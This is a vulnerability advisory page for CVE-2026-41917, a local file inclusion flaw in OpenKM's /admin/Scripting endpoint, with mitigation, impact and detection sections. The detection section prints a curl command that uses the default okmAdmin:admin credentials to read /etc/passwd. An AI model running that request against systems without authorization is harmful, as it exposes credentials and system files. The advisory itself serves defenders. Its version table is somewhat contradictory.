CVE-2026-41917
Deferred Deferred - Pending Action
Local File Inclusion in OpenKM 6.3.12 via Scripting Interface

Publication date: 2026-05-26

Last updated on: 2026-05-26

Assigner: VulnCheck

Description
OpenKM 6.3.12 contains a local file inclusion vulnerability in the administrative scripting interface at /admin/Scripting that allows authenticated administrators to read arbitrary files by supplying an attacker-controlled filesystem path through the fsPath parameter with action=Load. Attackers can exploit this to access sensitive files including /etc/passwd, configuration files containing database credentials, and JVM keystores accessible to the OpenKM process.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-05-26
Last Modified
2026-05-26
Generated
2026-06-15
AI Q&A
2026-05-26
EPSS Evaluated
2026-06-14
NVD
CVE-2026-41917
EUVD
EUVD-2026-31833
Affected Vendors & Products
Showing 3 associated CPEs
Vendor Product Version / Range
openkm openkm to 7.1.47 (exc)
openkm openkm to 7.1.47 (inc)
openkm openkm to 6.3.12 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-22 The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Mitigation Strategies

Immediate mitigation steps include restricting access to the administrative scripting interface to trusted administrators only.

Change default or weak administrative credentials to strong, unique passwords to prevent unauthorized access.

Disable or restrict the use of the /admin/Scripting interface if it is not required for daily operations.

Monitor and audit administrative access logs for suspicious activity.

Apply any available patches or updates from the vendor once released; currently, no official patch is available.

Implement network-level controls such as firewall rules to limit access to the OpenKM administrative interface.

Use compensating controls such as multi-factor authentication for administrative accounts.

Executive Summary

CVE-2026-41917 is a local file inclusion vulnerability found in OpenKM version 6.3.12 and related Professional Editions. It exists in the administrative scripting interface at the /admin/Scripting endpoint. Authenticated administrators can exploit this flaw by manipulating the fsPath parameter with the action=Load command to read arbitrary files on the server.

This vulnerability allows attackers to access sensitive files such as /etc/passwd, configuration files containing database credentials, and JVM keystores accessible to the OpenKM process. Exploitation requires administrative authentication but can lead to significant information disclosure.

Impact Analysis

Exploiting this vulnerability can lead to unauthorized disclosure of sensitive information stored on the OpenKM server. Attackers can read critical system files, configuration files with database credentials, and keystores, potentially enabling further attacks such as privilege escalation or full system compromise.

Since the vulnerability requires administrative authentication, attackers who gain or guess admin credentials (default credentials are known) can leverage this flaw to extract sensitive data and possibly chain it with other vulnerabilities like Remote Code Execution or SQL Injection to take over the system.

Detection Guidance

This vulnerability can be detected by verifying if the administrative scripting interface at /admin/Scripting is accessible and if the fsPath parameter with action=Load can be manipulated to read arbitrary files.

Proof-of-concept exploits and detection templates, including Nuclei templates, are available to automate detection.

A Python-based proof-of-concept tool exists that can be used to validate the vulnerability by attempting to read sensitive files such as /etc/passwd.

Since the exploit requires authentication, testing can be done using default or known administrative credentials (default: okmAdmin:admin).

  • Use curl or similar tools to send authenticated requests to the endpoint, for example:
  • curl -u okmAdmin:admin 'http://<target>/admin/Scripting?action=Load&fsPath=/etc/passwd'
  • Use the provided Python proof-of-concept tool from the exploit repository to automate detection.
  • Use Nuclei scanner with the available detection templates from the GitHub repository to scan for this vulnerability.
Compliance Impact

The vulnerability in OpenKM 6.3.12 allows authenticated administrators to read arbitrary sensitive files, including configuration files containing database credentials and JVM keystores. This unauthorized access to sensitive data can lead to data breaches and exposure of confidential information.

Such exposure of sensitive information can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require strict controls over access to personal and sensitive data, as well as protection against unauthorized disclosure.

Because the vulnerability enables attackers to access sensitive files and potentially escalate privileges, organizations using affected OpenKM versions may face increased risk of non-compliance, data breaches, and associated legal or regulatory consequences.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-41917. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart